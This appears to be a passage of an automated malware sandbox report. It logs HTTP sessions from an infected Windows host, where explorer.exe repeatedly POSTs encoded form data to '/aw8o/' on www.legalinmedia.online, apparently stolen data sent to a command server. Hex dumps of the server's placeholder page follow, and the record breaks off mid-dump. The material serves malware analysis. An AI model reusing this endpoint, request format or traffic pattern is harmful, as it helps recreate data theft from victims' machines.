20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65
                                                                                                                                                                                          Data Ascii: 10a8e<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title> </title><link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&display=swap" rel="stylesheet"><script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script><script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; } output.push(value); } re
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906194925 CEST688INData Raw: 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b
                                                                                                                                                                                          Data Ascii: turn output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++]; if ( (value & 0xF800) === 0xD800 ) {
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906301022 CEST689INData Raw: 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 6b 20 3d 20 30 3b 20 64 65 6c 74 61 20 3e 20 28 28 28 62 61 73 65 20 2d 20 74 6d 69 6e 29 20 2a 20 74 6d 61 78 29 20 3e 3e
                                                                                                                                                                                          Data Ascii: .floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floor(k + (base - tmin + 1) * delta / (delta + skew)
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906316996 CEST691INData Raw: 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 67 69 74 20 3d 20 64 65 63 6f 64 65 5f 64 69 67 69 74 28
                                                                                                                                                                                          Data Ascii: de_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_input(2)"); }
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906332970 CEST692INData Raw: 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 70 75 74 5b 69 5d 20 3d 20 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28
                                                                                                                                                                                          Data Ascii: if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output); }; this.encode = function (
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906344891 CEST693INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6d 20
                                                                                                                                                                                          Data Ascii: if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); } delta += (m - n) * (h + 1);
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906356096 CEST695INData Raw: 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 3d 30 3b 20 69 20 3c 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 2e 6c 65 6e 67 74 68
                                                                                                                                                                                          Data Ascii: in.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn--" + punycode.encode(s) :
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906435966 CEST696INData Raw: 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 32 39 35 45 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 77 72 61
                                                                                                                                                                                          Data Ascii: : 10px; } a { color: #14295E; } .wrapper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex; flex: 1 0 auto;flex-direction: column;justify-content: spa
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906447887 CEST697INData Raw: 72 3a 20 23 38 39 39 34 41 46 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: r: #8994AF; font-size: 10px; } .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906459093 CEST699INData Raw: 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 34 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 34 70
                                                                                                                                                                                          Data Ascii: .footer-links { padding: 14px 0; margin: 14px 0; border-top: 1px solid #F3F4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header
                                                                                                                                                                                          Aug 10, 2023 10:20:04.951984882 CEST700INData Raw: 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 62 65 76 65 6c 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 31 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20
                                                                                                                                                                                          Data Ascii: stroke-linejoin="bevel"/> <path opacity="0.1" fill-rule="evenodd" clip-rule="evenodd" d="M248.358 132.645L251.526 132.541L261.769 137.465L309.277 133.838L321.829 125.218L308.12 118.684L260.612 122.311L251.


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          24192.168.11.204973991.189.114.2780C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:20:07.434864044 CEST758OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.legalinmedia.online
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.legalinmedia.online
                                                                                                                                                                                          Referer: http://www.legalinmedia.online/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 526
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 52 75 34 6f 4a 47 4c 59 53 6f 51 31 70 38 4f 54 75 6d 72 44 74 69 77 64 64 58 6f 58 65 65 4e 4d 52 45 53 64 66 78 35 6f 2b 44 65 76 49 6d 46 46 67 5a 63 6d 6c 7a 79 38 37 61 69 57 46 59 68 54 32 33 4a 4a 41 36 64 6b 2b 6b 6c 67 6b 2f 35 6f 31 68 79 39 6b 39 76 51 59 45 75 32 4f 6b 66 48 4a 71 4d 63 52 36 32 76 55 63 57 4b 56 57 50 49 31 66 41 50 47 42 6e 4a 63 69 57 42 30 7a 6d 51 76 79 76 6a 2b 57 46 6d 2f 4e 59 41 55 71 74 33 5a 6d 61 42 4e 33 30 67 65 4e 35 73 6f 4e 2b 63 4c 79 37 78 34 41 47 59 4e 6f 47 31 58 6e 44 55 4a 64 62 71 69 61 59 44 6e 56 4e 55 6a 55 69 69 6e 4c 35 49 6a 65 5a 74 70 70 49 61 49 6f 64 6d 74 6a 43 65 63 67 2b 44 52 36 4d 70 38 59 4f 34 53 2b 58 59 55 52 6e 7a 44 2b 69 73 48 35 33 34 71 32 41 50 6b 4d 77 57 46 78 2b 5a 5a 76 4c 39 4d 2b 4e 68 4d 36 6a 55 33 54 30 52 30 4e 52 6c 4d 44 76 39 70 74 38 41 52 53 30 39 6b 71 54 76 4c 4e 76 4d 61 42 49 68 4d 38 68 6a 42 49 65 63 61 67 47 4f 35 30 78 74 56 52 31 54 6d 2f 77 48 32 4b 6a 73 35 59 65 77 4d 63 71 67 5a 64 50 76 4e 53 39 59 76 6f 65 64 43 6f 51 79 2b 6f 4e 49 4c 52 4a 49 5a 67 41 54 74 65 6f 75 6d 31 51 34 30 4a 6a 79 57 56 76 4e 76 4c 41 72 73 33 6f 4b 48 73 5a 49 58 66 53 76 30 41 73 6b 63 4b 34 34 49 50 35 65 32 6d 67 5a 57 6a 4f 58 77 38 6b 4c 7a 43 2b 4f 4d 78 35 2b 4a 73 33 77 48 67 4b 73 49 48 59 5a 59 67 65 63 5a 4a 41 54 76 56 4d 39 56 61 45 65 41 66 2b 6c 70 4e 4b 54 64 4c 59 55 2b 4f 53 4a 39 39 76 54 31 6e 74 2f 32 68 78 2f 31 4d 64 75 57 61 63 63 68 5a 34 58 43 4d 38 54 4e 78 4e 54 50 73 55 2b 31 47 41 55 71 54 37 55 49 57 74 39 67 6f 51 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=Ru4oJGLYSoQ1p8OTumrDtiwddXoXeeNMRESdfx5o+DevImFFgZcmlzy87aiWFYhT23JJA6dk+klgk/5o1hy9k9vQYEu2OkfHJqMcR62vUcWKVWPI1fAPGBnJciWB0zmQvyvj+WFm/NYAUqt3ZmaBN30geN5soN+cLy7x4AGYNoG1XnDUJdbqiaYDnVNUjUiinL5IjeZtppIaIodmtjCecg+DR6Mp8YO4S+XYURnzD+isH534q2APkMwWFx+ZZvL9M+NhM6jU3T0R0NRlMDv9pt8ARS09kqTvLNvMaBIhM8hjBIecagGO50xtVR1Tm/wH2Kjs5YewMcqgZdPvNS9YvoedCoQy+oNILRJIZgATteoum1Q40JjyWVvNvLArs3oKHsZIXfSv0AskcK44IP5e2mgZWjOXw8kLzC+OMx5+Js3wHgKsIHYZYgecZJATvVM9VaEeAf+lpNKTdLYU+OSJ99vT1nt/2hx/1MduWacchZ4XCM8TNxNTPsU+1GAUqT7UIWt9goQ=
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481455088 CEST759INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:20:07 GMT
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Data Raw: 66 66 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e d0 9d d0 b5 20 d0 be d0 bf d1 83 d0 b1 d0 bb d0 b8 d0 ba d0 be d0 b2 d0 b0 d0 bd 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74
                                                                                                                                                                                          Data Ascii: ff2c<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title> </title><link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&display=swap" rel="stylesheet"><script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script><script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; } output.push(value); } ret
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481540918 CEST761INData Raw: 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d
                                                                                                                                                                                          Data Ascii: urn output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++]; if ( (value & 0xF800) === 0xD800 ) {
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481600046 CEST762INData Raw: 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 6b 20 3d 20 30 3b 20 64 65 6c 74 61 20 3e 20 28 28 28 62 61 73 65 20 2d 20 74 6d 69 6e 29 20 2a 20 74 6d 61 78 29 20 3e 3e 20
                                                                                                                                                                                          Data Ascii: floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floor(k + (base - tmin + 1) * delta / (delta + skew))
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481656075 CEST763INData Raw: 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 67 69 74 20 3d 20 64 65 63 6f 64 65 5f 64 69 67 69 74 28 69
                                                                                                                                                                                          Data Ascii: e_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_input(2)"); }
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481745005 CEST765INData Raw: 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 70 75 74 5b 69 5d 20 3d 20 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6f
                                                                                                                                                                                          Data Ascii: if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output); }; this.encode = function (i
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481806993 CEST766INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6d 20 2d
                                                                                                                                                                                          Data Ascii: if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); } delta += (m - n) * (h + 1);
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481879950 CEST767INData Raw: 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 3d 30 3b 20 69 20 3c 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 2e 6c 65 6e 67 74 68 3b
                                                                                                                                                                                          Data Ascii: n.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn--" + punycode.encode(s) :
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481937885 CEST769INData Raw: 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 32 39 35 45 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 77 72 61 70
                                                                                                                                                                                          Data Ascii: 10px; } a { color: #14295E; } .wrapper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex; flex: 1 0 auto;flex-direction: column;justify-content: spac
                                                                                                                                                                                          Aug 10, 2023 10:20:07.482008934 CEST770INData Raw: 3a 20 23 38 39 39 34 41 46 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: : #8994AF; font-size: 10px; } .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap:
                                                                                                                                                                                          Aug 10, 2023 10:20:07.482069016 CEST771INData Raw: 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 34 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 34 70 78
                                                                                                                                                                                          Data Ascii: .footer-links { padding: 14px 0; margin: 14px 0; border-top: 1px solid #F3F4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header>
                                                                                                                                                                                          Aug 10, 2023 10:20:07.527467012 CEST773INData Raw: 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 62 65 76 65 6c 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 31 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63
                                                                                                                                                                                          Data Ascii: troke-linejoin="bevel"/> <path opacity="0.1" fill-rule="evenodd" clip-rule="evenodd" d="M248.358 132.645L251.526 132.541L261.769 137.465L309.277 133.838L321.829 125.218L308.12 118.684L260.612 122.311L251.2


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          25192.168.11.204974091.189.114.2780C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:20:10.014877081 CEST832OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.legalinmedia.online
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.legalinmedia.online
                                                                                                                                                                                          Referer: http://www.legalinmedia.online/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 52914
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 52 75 34 6f 4a 47 4c 59 53 6f 51 31 70 38 4f 54 75 6d 72 44 74 69 77 64 64 58 6f 58 65 65 4e 4d 52 45 53 64 66 78 35 6f 2b 44 57 76 4a 55 39 46 68 36 45 6d 30 44 79 38 33 36 69 4c 46 59 68 4b 32 33 52 4e 41 36 52 30 2b 6e 64 67 6b 70 6c 6f 31 79 57 39 6a 39 76 52 45 55 75 30 4b 6b 65 51 4a 71 51 41 52 36 4b 5a 55 73 4b 4b 53 55 48 49 79 73 59 4d 4b 78 6e 48 63 69 57 4e 77 7a 6d 79 76 79 6a 4a 2b 57 5a 6d 2f 4c 59 41 58 34 6c 33 56 58 61 42 56 58 30 76 4c 39 34 39 6d 74 2f 73 4c 79 76 4c 34 41 47 6d 4e 73 32 31 58 68 50 55 62 4f 7a 70 6a 36 59 44 70 31 4e 4c 31 55 6e 6c 6e 4c 31 51 6a 65 39 74 70 72 59 61 4b 49 64 6d 6e 69 43 64 4b 51 2b 61 56 36 4d 45 34 59 43 4b 53 2b 44 4d 55 52 7a 7a 43 4f 6d 73 47 4f 6a 34 6d 79 55 50 6e 73 77 49 4c 52 2b 52 54 50 4c 68 4d 2b 64 44 4d 36 43 68 33 55 30 52 79 73 78 6c 61 58 44 2b 71 4e 38 5a 55 53 31 35 67 71 65 67 4c 4e 2b 50 61 42 49 50 4d 39 6c 6a 41 37 57 63 62 69 2b 4e 37 6b 77 6e 4d 42 31 61 76 65 4d 33 32 4a 48 65 35 59 36 67 4d 66 47 67 59 39 50 76 48 56 52 66 6c 59 65 65 4b 49 51 67 68 34 4d 53 4c 52 46 6c 5a 6c 68 6f 73 74 63 75 67 46 41 34 2b 35 6a 74 53 31 76 4a 32 62 41 74 37 6e 6f 4b 48 73 55 76 58 66 4f 76 30 55 6f 6b 64 35 67 34 44 34 4e 65 35 47 67 58 57 6a 4f 43 77 39 59 43 7a 43 32 73 4d 79 67 62 4a 75 37 77 48 78 61 73 59 56 67 61 64 51 65 54 64 4a 41 45 72 55 78 37 56 61 49 73 41 66 4f 66 6f 2b 4f 54 61 4c 49 55 30 75 53 4f 34 64 76 55 68 33 74 6c 68 78 73 2b 31 4d 41 5a 57 61 41 4d 68 65 38 58 43 72 42 2b 65 51 56 51 4d 39 41 79 7a 57 52 44 32 54 6e 35 59 45 34 2f 78 76 63 39 31 34 65 37 50 7a 4a 43 77 76 4d 4f 39 67 66 46 42 46 6b 56 4c 5a 50 36 31 67 46 71 50 57 73 7a 64 39 65 75 4d 73 2f 4e 51 31 38 4c 57 64 4a 69 4a 34 35 50 75 45 50 4e 39 41 72 66 67 6c 63 36 73 71 68 4e 51 52 38 63 63 50 59 77 32 7a 33 46 59 48 6f 4e 69 70 77 4a 59 4f 4e 34 71 51 50 61 69 36 6d 34 6f 4c 4d 58 68 6b 42 5a 45 65 38 32 58 54 39 57 39 76 50 78 48 73 5a 79 4f 4c 2b 6f 46 38 65 79 74 2b 4f 44 74 78 77 75 46 52 5a 38 5a 4f 68 34 6d 43 36 43 52 4e 6c 6e 6e 45 68 4f 6b 54 47 57 6e 2f 6a 53 4e 4b 2b 6b 49 32 57 47 5a 59 52 72 61 6c 43 6a 50 51 32 6a 56 77 59 62 5a 77 42 6d 46 62 45 59 62 65 59 6a 48 76 44 37 55 79 48 4e 59 59 34 57 54 79 43 79 41 45 48 53 59 52 77 57 34 4d 59 7a 61 48 32 49 55 56 64 4d 73 6e 33 64 74 45 43 43 6f 65 45 2f 77 72 64 56 78 48 79 75 2b 71 75 76 33 50 78 6f 57 31 74 70 65 48 73 6f 53 43 56 32 6e 44 73 4b 58 58 4a 50 63 6e 74 54 51 49 6b 4d 34 7a 43 6e 69 63 57 71 4f 37 44 32 71 61 78 43 56 